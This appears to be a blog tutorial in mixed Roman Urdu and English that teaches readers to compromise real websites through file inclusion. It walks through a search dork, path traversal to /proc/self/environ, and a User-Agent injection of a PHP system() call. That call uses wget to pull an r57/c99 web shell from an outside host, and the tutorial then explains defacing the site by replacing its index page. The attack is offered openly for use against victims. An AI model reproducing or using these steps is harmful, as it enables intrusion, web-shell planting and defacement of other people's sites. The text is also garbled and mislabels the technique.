Tut:Remote File
Inclusiom (RFI).
Wht u need.
N0-1 mozilla firefox.
N0-2 tamper data.(its
firfox addon Google it).
N0-3 A shell
(recommended r57 or c99 google it).Upload it on fre hosting as .Txt.
Par mai kuch yahan
upload karta hn ap b yahan karo sai rahe ga see step 4.
N0-4 A account on
drivehq.Com.And their upload ur shel as .Txt.
N0-5 A vuln web and
little brain.
Lets start.
Dork
:.Php?Page-contact.Php
kafi site milae ge
par vuln buhat kam its ur luck.Patience rakho ge mil jai ge vuln web.
Nw web jo select ke
us k akhr mai yae hoga /page=career.Php.
Then replace after
page= with ths
../../../../../../../../../proc/self/environ
(../ yae apne marzi
se torae zada dal dijai ga 10 12).
Ur link will be like
ths
www.Web.Com/page=../../../../../../../proc/self/environ
jaise enter karen ge
web par ek ajeeb code ajai ga.Agar yae code iya tou web vuln h..Ap agae kam
karo.Code nh iya tou next web par try karo.
Jaise bola tha kahin
apka shel upload hona chayae .Txt format mai.Mai drivehq par karta hn.Lfi
string bnate hain.
Nw lfi string would
be
<?system('wget
http://www.Web.Com/shel.Txt -o shell.Php');?>
is mai
www.Web.Com/shel.Txt apka shel link h.Ja han apne shel upload kia ho.Mai jb
karta tha drive hq use karta hn.
Oka.Lfi string note
pad mai likhna then.Jahan Code araha tha(../../ yae likhne k bd) wahan us page par option mai ja kar tamper
data on karo.Then tamper data mai click on start tamper.Ek dum window i ge
wahan click karna tamper par.
Tamper par click k bd
ek aur window khule ge wahan USER AGENT mai wo jo lfi string tha dal daina..Lfi
string paste kardaina.
Phr oka par click.Phr
stop temper data par click kardaina ya bnd kardaina.
You have done it.
Www.Site.Com/shell.Php
kholo ge tmra shell execute hojai ga web par..
Bingo. . . .
Nw enjoy hacking and
brust ur victim.
Chalo deface kartae
hain.Make sure shel par yae likha i public§html.
Nh tou executing
comand se is directory mai jana.Waise phelay se is he mai hoge.
Upload ka option hoga
shel mai. index.Html k nam se deface page daldo.
Chck karo upload hua
ya nh.
Www.Site.Com/index.Html.Agar
deface page khule
then shell sari files
dikha raha hoga.Index nam ke file dhundna aur delet kar daina.Phr tmra deface
page yahan i ga.
Www.Site.Com
End. . . . .
0 comments:
Post a Comment